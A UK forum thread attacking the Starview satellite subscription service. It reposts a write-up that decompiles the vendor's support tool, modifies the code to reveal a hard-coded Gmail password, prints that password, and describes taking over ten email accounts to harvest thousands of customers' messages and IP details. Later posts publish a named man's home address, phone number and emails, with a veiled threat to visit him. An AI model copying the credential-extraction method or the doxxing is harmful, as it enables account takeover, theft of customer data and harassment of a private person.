STARVIEW RIP OFF YET AGAIN

only stories here are the ones you and the other starview shysters are telling.personally if i never see a perfectly good forumn littered with this crap it will still be too soon.

 

i see that starview have just put up the subscrition fee from £25 to £35 for 6 months.

 

BARGAIN

 

NEARLY 2 MONTHS ON AND STILL NOT BACK PMSL HERE WHERE ARE YA HIDING NOW Yerpsostarview

 

TAKEN FROM THE WEBSITE THAT IS PERTAINING TO HAVE ALL THIS LEAKED INFO

Dont take my word see read the full story and more http://www.mystarview.cu.cc/dataleak1.html

 

think we might do a name and shame of starview members bogus statements,hmm
ah yes " starview members hall of shame" or bullsh1t posts.

 

snedz

Data Leak? What Data Leak?
So The Kiddy is still insisting that there has been no data compromised from the starview subscription system and support forum, and that the emails are not been sent using their data. mmmmk. So let's put the final nail in the StarView coffin.

You ARE the weakest link... Good Bye!
Any systems security is only as strong as it's weakest link. With the StarView model lets start at the beginning. Customers (or victims as we here at mystarview.cu.cc like to call them) were invited to submit there details using a "StarView Support Request" tool to make enquiries about registering there products and serial numbers, along with filling out a survey about there products. This was initially released as version 1.0 but later upgraded to 1.02.

It can be downloaded from here.

A quick analysis of the executable file shows it to be a .net application so we fire up our favourite .net disassembler, Reflector by Red Gate Software. Disassemble it as C# for best results. We use .Net 3.5 as we were recompiling under Visual C# 2008.

Disassembling the StarviewSupportRequest2.exe file
Open the assembly file StarviewSupportRequest2.exe. It should be added to the tree on the left. Expand it and you should see some details on the exe, and it's resources. One of the nodes will be StarviewSupportRequest. Expand it again, and you will see some classes:

- Crypto
- Form1
- MailAddresses
- MailClient
- Program

Click on Form1, this is the start of the main program. The right hand side will give you a list of methods. At the bottom will be a link to expand the methods. This gives you the C# code behind the methods.

The most important method in here is cmdSubmit_Click.
This is what is called when you click the button to submit your information to mystarview (and anybody else who cares to listen in). Once called it peforms some basic error checking to make sure you have entered your email, box number and selected a product.

It then creates an instance of the class MailAddresses and calls a method within it - getRandomAddress(2) located inside the addresses class.

MailAddresses addresses = new MailAddresses();
List<string> list = addresses.getRandomAddress(2);

The getRandomAddress is a function that takes a parameter that specifies how many email address you want in the list returned.

public List<string> getRandomAddress(int number)
{
Random random = new Random((int) DateTime.Now.Ticks);
new StringBuilder();
List<string> list = new List<string>();
for (int i = 0; i < number; i++)
{
string item = this.emails[random.Next(1, 10) - 1];
bool flag = true;
while (flag)
{
if (!list.Contains(item))
{
list.Add(item);
flag = false;
}
}
}
return list;
}

This snippet of code returns a list of email addresses of the requested count, from a list of 10 possible ones. These are located in the constructer of the MailAddresses class:

this.emails.Add("HareGib@gmail.com");
this.emails.Add("HareBees@gmail.com");
this.emails.Add("HareHell@gmail.com");
this.emails.Add("HareHeaven@gmail.com");
this.emails.Add("HareBeard@gmail.com");
this.emails.Add("260clarence1@gmail.com");
this.emails.Add("260clarence2@gmail.com");
this.emails.Add("260clarence3@gmail.com");
this.emails.Add("260clarence4@gmail.com");
this.emails.Add("260clarence5@gmail.com");

The code then continues onto SendtoAddress located inside the MailAddresses module. This sets up some basic email details to send an email via smtp.gmail.com

public bool SendtoAddress(string address, string supportRequired, string userEmail, string product, string serialnumber, string problem, Ratings ratings)
{
MailClient client;
client = new MailClient {
Host = "smtp.gmail.com",
EmailAddress = address,
DisplayName = "StarView Support",
MessageBody = client.MessageBody + "Support Required: \n " + supportRequired + "\n\n",
MessageBody = client.MessageBody + "User Email: \n " + userEmail + "\n\n",
MessageBody = client.MessageBody + "Product: \n " + product + "\n\n",
MessageBody = client.MessageBody + "Serial Number: \n " + serialnumber + "\n\n",
MessageBody = client.MessageBody + "Problem: \n " + problem + "\n\n",
MessageBody = client.MessageBody + "Customer Survey: \n\n",
MessageBody = client.MessageBody + " Product: " + ratings.Product + "\n",
MessageBody = client.MessageBody + " Support: " + ratings.Support + "\n",
MessageBody = client.MessageBody + " Cost: " + ratings.Cost + "\n",
MessageBody = client.MessageBody + " Reliability: " + ratings.Reliability + "\n",
MessageBody = client.MessageBody + " Quality: " + ratings.Quality + "\n",
MessageBody = client.MessageBody + " Overall: " + ratings.Overall + "\n",
MessageSubject = supportRequired + " " + userEmail,
Password = this.HashedPassword
};
return client.send();
}

The program then logs onto the gmail accounts and sends the data as an email.

This means the application must store the password to be able to log into the smtp server within the application.

Something for us to have a nosey around...

Notice the last line of the initialisation?

At a first glance it may look like it returns the hashed (encrypted) password, but on a closer look, the 'get' method of propeerty is overridden to first decrypt the password and then return the decrypted version.

// Properties
public string HashedPassword
{
get
{
return this.decryptPassword(this.hashedPassword);
}
}

So they made some attempt to hide this password... look into decryptPassword.

private string decryptPassword(string hashedPassword)
{
return Crypto.DecryptStringAES(hashedPassword, this.sharedSecret);
}

So we can see this takes an encrypted password in hashedPassword, and a shared 'secret' as the key to decrypt it. The method of decryption is called AES, or the Advanced Encryption Standard. Whilst this method of encryption is in itself considered secure, any form of encryption is useless if the relevant keys are known to decrypt it, even more so if the code is called to decrypt it.

The code behind the built in DecryptStringAES function is a follows:

public static string DecryptStringAES(string cipherText, string sharedSecret)
{
if (string.IsNullOrEmpty(cipherText))
{
throw new ArgumentNullException("cipherText");
}
if (string.IsNullOrEmpty(sharedSecret))
{
throw new ArgumentNullException("sharedSecret");
}
RijndaelManaged managed = null;
try
{
Rfc2898DeriveBytes bytes = new Rfc2898DeriveBytes(sharedSecret, _salt);
managed = new RijndaelManaged {
Key = bytes.GetBytes(managed.KeySize / 8),
IV = bytes.GetBytes(managed.BlockSize / 8)
};
ICryptoTransform transform = managed.CreateDecryptor(managed.Key, managed.IV);
using (MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText)))
{
using (CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read))
{
using (StreamReader reader = new StreamReader(stream2))
{
return reader.ReadToEnd();
}
}
}
}
finally
{
if (managed != null)
{
managed.Clear();
}
}
return null;
}

Don't let this code confuse you, they took it directly from here. They have moved a few things around, but some key details such as the salt remained unchanged. This suggests that the developer does not understand much about encryption or security.

Given what we now know it is very easy to decrypt the password. Probably the easiest method is to just make the application show the password in a dialogue box after it has decrypted it, instead of actually sending the mail. This modification is simple, In the function SendToAddress we just comment out the line that actually sends the email and make it display the password instead.

public bool SendtoAddress(string address, string supportRequired, string userEmail, string product, string serialnumber, string problem, Ratings ratings)
{
MailClient client;
client = new MailClient {
Host = "smtp.gmail.com",
EmailAddress = address,
DisplayName = "StarView Support",
MessageBody = client.MessageBody + "Support Required: \n " + supportRequired + "\n\n",
MessageBody = client.MessageBody + "User Email: \n " + userEmail + "\n\n",
MessageBody = client.MessageBody + "Product: \n " + product + "\n\n",
MessageBody = client.MessageBody + "Serial Number: \n " + serialnumber + "\n\n",
MessageBody = client.MessageBody + "Problem: \n " + problem + "\n\n",
MessageBody = client.MessageBody + "Customer Survey: \n\n",
MessageBody = client.MessageBody + " Product: " + ratings.Product + "\n",
MessageBody = client.MessageBody + " Support: " + ratings.Support + "\n",
MessageBody = client.MessageBody + " Cost: " + ratings.Cost + "\n",
MessageBody = client.MessageBody + " Reliability: " + ratings.Reliability + "\n",
MessageBody = client.MessageBody + " Quality: " + ratings.Quality + "\n",
MessageBody = client.MessageBody + " Overall: " + ratings.Overall + "\n",
MessageSubject = supportRequired + " " + userEmail,
Password = this.HashedPassword
};
// return client.send();
MessageBox.Show(client.Password); // Display the now-decrypted password in a dialogue box
return true;
}

For those unable to recompile the modified code, the decrypted password is aIJIKJ787HUJHxd

So what next?
With this information we were able to go over to www.gmail.com and have a look at their accounts.

The program uses each of the two selected gmail accounts to send the email 'from' itself 'itself'. The gmail accounts were then configured to forward the emails onto either box1969@hotmail.co.uk or support@mystarview.com, deleting the original message once forwarded

Why this complex arrangement instead of sending direct to a different email address without a public password? Who knows, but this opens a can of worms for abuse.

First we reconfigured all of there mail boxes to not delete the message once forwarded on. We then set the gmail accounts to be enabled for POP3 collection. Finally we setup 2 gmail accounts of our own. gmail has a nice feature that allows you to add the details for up to 5 other email addresses that it will connect email from, so between our 2 email addresses we were able to harvest the emails from all 10 of the StarView support email addresses.

How long ago did we do this?
On the first day they released the the support tool! We even managed to capture their own testing emails.

From: StarView Support <haregib@gmail.com>
To: "StarView Support" <HareGib@gmail.com>
Date: Thu, 28 Jul 2011 04:53:56 -0700 (PDT)
Subject: 12 Months VIP Support test@thekiddy.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Support Required: =0A 12 Months VIP Support=0A=0AUser Email: =0A test@thekiddy.com=
=0A=0AProduct: =0A Starview 1=0A=0ASerial Number: =0A test@thekiddy.com=
=0A=0AProblem: =0A test@thekiddy.com=0A=0ACustomer Survey: =0A=0A =
Product: =0A Support: =0A Cost: =0A Reliability: =0A Quality:=
=0A Overall: =0A


From: "StarView Support" <260clarence3@gmail.com>
To: "StarView Support" <260clarence3@gmail.com>
Date: Thu, 28 Jul 2011 02:28:21 -0700 (PDT)
Subject: 6 Months Support Gift Card test@thekiddy.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Support Required: =0A 6 Months Support Gift Card=0A=0AUser Email: =0A=
test@thekiddy.com=0A=0AProduct: =0A Starview 1=0A=0ASerial Number:=
=0A test@thekiddy.com=0A=0AProblem: =0A test@thekiddy.com=0A=0ACustomer=
Survey: =0A=0A Product: =0A Support: =0A Cost: =0A Reliability:=
=0A Quality: =0A Overall: =0A

Notice the date on the emails? This shows you just how long we have been intercepting the emails.

We would like to point out we attempted to contact TheKiddy on the StarView support forum to tell him his system was leaking details; the result was he banned us.

The interesting detail about emails however is there headers. They contain a complete trace of the email from start to finish as it is delivered to it's final destination. In this case, the start was the customers PC, so the headers contained the IP/Hostname and computer name of the sender - This is how we got this information in the recently sent out emails. The rest of the information was what you entered into the support program (box number, your email address)

We collected several thousand email addresses and recently emailed a small number of people.

Why are we sending out emails?
Because The Kiddy is taking the piss out of his customers by ripping them off, and ignoring their complaints. He continually refuses to admit there had been any chance of a data leak - but the data had been stolen from his system long before it even reached the intended receipents. They lost control of the flow of the email right at the first stage due to a complete lack of understanding on how to secure this very confidential information.

We informed The Kiddy that his system was leaking private details over a year ago by PM on his site. Instead of listening to our advice and securing the system, he banned us from his site. Something that has become all to common when anything negative is said about them on their site.

Maybe the Kiddy would like to offer his customers an appology now and admit that his design was insecure leading to this massive breach of security we exploited.

As of 29th November 2012, we have commandeered the gmail accounts to prevent others from abusing the system. As a result the StarView support tool 1.02 is now permanently broken. The recovery information was also removed so they won't be getting them back any time soon.

We were also pissed off that The Kiddy was in such a hurry to get his payment system back up and running to take new subs, despite the fact he has not got the channels put back on yet and that there are hundreds of people who have paid and are awaiting activation. The Kiddy has asked those who paid by PayPal to request a refund and pay him his new increased prices. He is ignoring the fact that he may have already withdrawn your money into his account, and most of you will not be able to claim a refund by PayPal because it is now over the maximum time permitted for a claim. It's very clear his only priority is obtaining your money.

And Finally...
For those who did not use the support tool... Don't think your details are safe!

THIS IS NOT THE ONLY SECURITY ISSUE OR DATA LEAK THEY HAVE SUFFERED

More to come on that later. Were saving that one for (another) rainy day.

It is just the earliest one in the chain of events that occur when you to subscribe, so we chose to abuse this one first. It shows there complete lack of understanding of basic security and how they have lost control of their security so early on. That makes this a nice little exploit. But it's not the only one...

Update 02/12/2012
Why is it that the staff at mystarview.com are banning any and all members who dare to ask about their personal information been leaked, and removing all posts relating to anything bad about StarView and there security. Looks like TheKiddy is still hiding behind denial. Very shoddy operation.

All data is owned by mystarview.com, but utilised by mystarview.cu.cc for the benefit of the customer.
No Wuffle-Duffles were reconfigured during the 18 months we were stealing the emails.
Revision 1.0 Last Updated: 30th November 2012.
Free Web Counter
Free Web Counter.....I HAVE TO ADD THAT THIS IS FROM THE BEST CODER IN ENGLAND CHEERS M8

 

Well folks looks like Starview has finally pulled the plug, all the remaining boxes that have been working have been switched off, maybe for the last time hopefully.

 

Folks, I am inexperienced in all this jargon, starview HD combo is still working, but can you tell me what "SUB" means please.

 

the starview hd combo only works on vermin if u have a private share server to sub from or use it on sly and and get a sub.

sub = subscription to a server also called a c-line or n-line

 

i think your wrong there there was no cable firmware for the hd combo,but you can use the sat side to anyone of your choice.

 

so you think starview is working,more like baiting the trap again for mugs to pay,anybody stupid enough to go down that road again with a 2 year sub deserves to be ripped off.

 

Well for the last 6mts all the boxes have had is the sports and the rest nearly all FTA sure you be better of with a freeview box for what you get on their boxes

 

Well looks like this is the guy that is registered owner of www.mystarview.com, he has been a naught boy. ^-^

Man guilty of fake DVD scam 24th July 2009

A city man who admitted manufacturing counterfeit DVDs was sentenced to 240 hours community work by Peterborough Crown Court yesterday (Thursday 23 July 2009).

Noel Watling (39) of Clarence Road, Peterborough, was arrested in a joint operation between Peterborough Trading Standards and Cambridgeshire Police in August 2007. Officers raided a house in Bretton and seized more than 5,000 counterfeit DVDs, 20,000 blank DVDs and specialist copying equipment worth an estimated £15,000.

Watling pleaded guilty to 14 charges under the Trade Marks Act 1994, when he appeared before Peterborough Crown Court in June. He admitted manufacturing counterfeit DVD’s for a period of 12 months; and that his equipment had been specifically adapted to enable copying.

On Thursday, he was sentenced at Peterborough Crown Court to 240 hours unpaid work in the community, a 51-week suspended sentence for two years in relation to each offence, and will be subject to an 18-month supervision order.

Additionally, the court made an order forfeiting all items seized and also a confiscation order under the Proceeds of Crime Act 2002 for £41,500. This figure represents the benefit obtained from Watling's criminal enterprise. However, the financial investigation did not recover any assets from which this could be paid.

Jo Russell, Peterborough City Council's head of business regulation, said: "This operation is a great example of teamwork by Peterborough City Council and Cambridgeshire Constabulary. We will continue to work with our enforcement partners to make sure that we stamp out these illegal 'businesses' within Peterborough.

"People should be aware that in purchasing a pirate DVD they are helping to fund criminal organisations and are also affecting the livelihoods of local retailers and their employees. This investigation has halted a counterfeiting enterprise worth thousands of pounds and we hope this sends out a clear warning to anyone else who thinks breaking the law is acceptable."

Residents who have information on counterfeiting activity within Peterborough can call Consumer Direct on 08454 040506. Alternatively, they can pass on details by emailing trading.standards@peterborough.gov.uk

http://www.peterborough.gov.uk/news/latest_news/2009/july_2009/fake_dvd_scam.aspx

Domain Name: MYSTARVIEW.COM
Created Date: 09-Jul-2011
Expiry Date: 09-Jul-2013
Nameserver: ns.123-reg.co.uk
Nameserver: ns2.123-reg.co.uk
Registrant Name: noel watling
Registrant Company: 123-reg
Registrant Address: he old police house
Registrant Address:
Registrant Address:
Registrant Address: peterborough
Registrant Address: cambridgeshire
Registrant Address: PE1 2DL
Registrant Address: United Kingdom
Technical Name: noel watling
Technical Company: 123-reg
Technical Address: he old police house
Technical Address:
Technical Address:
Technical Address: peterborough
Technical Address: cambridgeshire
Technical Address: PE1 2DL
Technical Address: United Kingdom
Technical Email: noel.watling@hotmail.co.uk
Technical Tel: +44.01733565656
Technical Fax:
Administrative Name: noel watling
Administrative Company: 123-reg
Administrative Address: he old police house
Administrative Address:
Administrative Address:
Administrative Address: peterborough
Administrative Address: cambridgeshire
Administrative Address: PE1 2DL
Administrative Address: United Kingdom
Administrative Email: box1969@hotmail.co.uk
Administrative Tel: +44.01733565656

http://www.whoislookup.ie/whois.php

 

will call over on wednesday lol.

 

while everyone is at it why dont i just start naming everyones details can you remember me e45

 

yes remember the name do you remember me ?? hopefully you do ^_^

 

Looks like he has nothing more to say on the subject

 

Looks like SV have not given up ripping off their customers, they have started another web site!!